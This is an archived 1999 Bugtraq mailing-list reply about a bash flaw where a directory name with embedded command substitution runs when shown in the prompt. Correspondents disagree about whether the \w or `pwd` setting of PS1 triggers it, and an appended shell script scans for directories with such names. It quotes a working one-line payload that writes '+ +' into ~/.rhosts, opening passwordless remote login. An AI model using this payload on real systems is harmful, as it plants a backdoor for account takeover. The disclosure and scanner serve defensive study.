Bugtraq mailing list archives

Re: Bash Bug


From: philip.rueegsegger () BRUKER CH (Ph. Rueegsegger)
Date: Fri, 23 Apr 1999 11:25:58 +0100


Date sent:              Thu, 22 Apr 1999 01:39:48 +0100
Send reply to:          Andy Church <achurch () DRAGONFIRE NET>
From:                   Andy Church <achurch () DRAGONFIRE NET>
Subject:                Re: Bash Bug
Originally to:          shadow () OPERATOR ORG
To:                     BUGTRAQ () netspace org

Hello together

Figured while everyone was working with bash, I might as well make this
one public (I apologize if this is old news, apparently it hasn't been fixed
if so).

If a user creates a directory with a command like

mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

Not bad !


and someone cd's into said directory, either by accident, or whatever,
then it will cause it to actually execute.

     Just to clarify, this only happens if PS1 (the bash prompt) contains
\w or \W _and_ a prompt is displayed containing the bogus directory name.
This means unattended shell scripts are safe.  As a workaround, use `pwd`
in place of \w.

Sorry, with bash version 2.01.1 (supplied with SuSE 5.3) it is just the
opposite of what you are clarifying. If one has \w or \W specified in
PS1 to show the path, it does NOT happen, and if `pwd` is specified
instead of \w or \W it DOES happen.


     Tested with bash 1.14 (it's the only one I have handy).

  --Andy Church
    achurch () dragonfire net
    http://achurch.dragonfire.net/

Kind regards
Phibus
-----------------------------------------------------------
                     Philip Rueegsegger
                      System Manager

Bruker AG                Direct dial   : +41-1-825 93 46
Industriestrasse 26      Telephone     : +41-1-825 91 11
CH-8117 Faellanden       Telefax       : +41-1-825 94 69
Switzerland              E-Mail        : philip.rueegsegger () bruker ch
-----------------------------------------------------------
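
The two reports above disagree on which PS1 form triggers evaluation, but both depend on a directory whose name contains command-substitution syntax. The following is an added example, not part of the original messages: a POSIX shell audit that finds such directories. The function names are hypothetical, and the names tested for are limited to a backtick or `$(`.

```shell
#!/bin/sh
# Added example (not from the thread): locate directories whose names contain
# command-substitution syntax, so they can be reviewed before anyone's
# interactive shell displays them in a prompt.

# risky_name NAME
# Returns 0 if NAME contains a backtick or "$(", 1 otherwise.
# The name is only pattern-matched, never evaluated.
risky_name() {
    case $1 in
        *'`'*|*'$('*) return 0 ;;
        *) return 1 ;;
    esac
}

# scan_tree ROOT
# Prints one line per matching directory under ROOT. Non-printable bytes
# (including newlines embedded in a name) are shown as "?" so that each
# directory yields exactly one line and the report is safe to view.
scan_tree() {
    find "$1" -type d \( -name '*`*' -o -name '*$(*' \) -exec sh -c '
        for p do
            printf "%s" "$p" | LC_ALL=C tr -c "[:print:]" "?"
            echo
        done' sh {} +
}

# count_risky ROOT
# Prints the number of matching directories under ROOT.
count_risky() {
    scan_tree "$1" | wc -l | tr -d ' '
}

# Typical use (path is an assumption): scan_tree /home
```

The scan reports names only; whether a given bash version evaluates them depends on the PS1 setting discussed in the messages above.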


